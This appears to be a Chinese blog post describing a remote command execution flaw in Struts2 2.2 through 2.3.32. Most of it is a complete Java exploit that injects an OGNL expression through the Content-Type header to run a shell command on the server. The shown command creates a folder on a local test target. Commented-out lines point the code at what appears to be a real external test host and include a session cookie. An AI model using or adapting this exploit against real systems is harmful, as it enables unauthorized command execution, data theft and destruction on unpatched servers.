前端开发
623
据最新消息,Struts2 2.2 到 2.3.32以下版本存在严重漏洞,攻击者可以通过此漏洞攻击任意使用了这两个版本的Struts2系统,并在目标机器执行任意脚本。
该漏洞目前在Windows和Linux下均可以攻击,注入成功,即可在客户机下进行任意命令,包含安装木马,拦截目标机器数据,删除数据等等。
现贴出测试代码:
package com.blog.test; import java.io.BufferedReader; import java.io.InputStreamReader; import java.io.PrintWriter; import java.net.URL; import java.net.URLConnection; public class TestGongji { static String url = "http://localhost:8080/Struts2Pro/"; //static String url = "http://dwxt.test.chinaclear.cn/admin/login.action"; public static void main(String[] args) { String rlt2 = sendPost(url, "1"); System.out.println(rlt2); } private static String sendPost(String urlStr, String param) { String result = null; try { URL url = new URL(urlStr); URLConnection conn = url.openConnection(); conn.setRequestProperty("accept", "*/*"); conn.setRequestProperty("connection", "Keep-Alive"); //conn.setRequestProperty("cookie", "0000sPhRUJJTfYf9d3TiPf6HTXW:1agu86nml"); // conn.setRequestProperty("referer", "http://qqxt.test.chinaclear.cn/login.do"); conn.setRequestProperty("Content-Type", "s-multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('cmd /c mkdir c:\\hello')};"); conn.setDoOutput(true); conn.setDoInput(true); PrintWriter out = new PrintWriter(conn.getOutputStream()); out.print(param); out.flush(); BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream())); String line = null; while ((line = in.readLine()) != null) { result += line; } } catch (Exception e) { e.printStackTrace(); } return result; } }
在此代码中,我们尝试攻击了本地的 一个叫做Struts2Pro的视图struts2项目,同时使用命令在攻击的目标机器中的C:/盘下创建一个hello的文件夹,执行后发现成功创建该文件夹。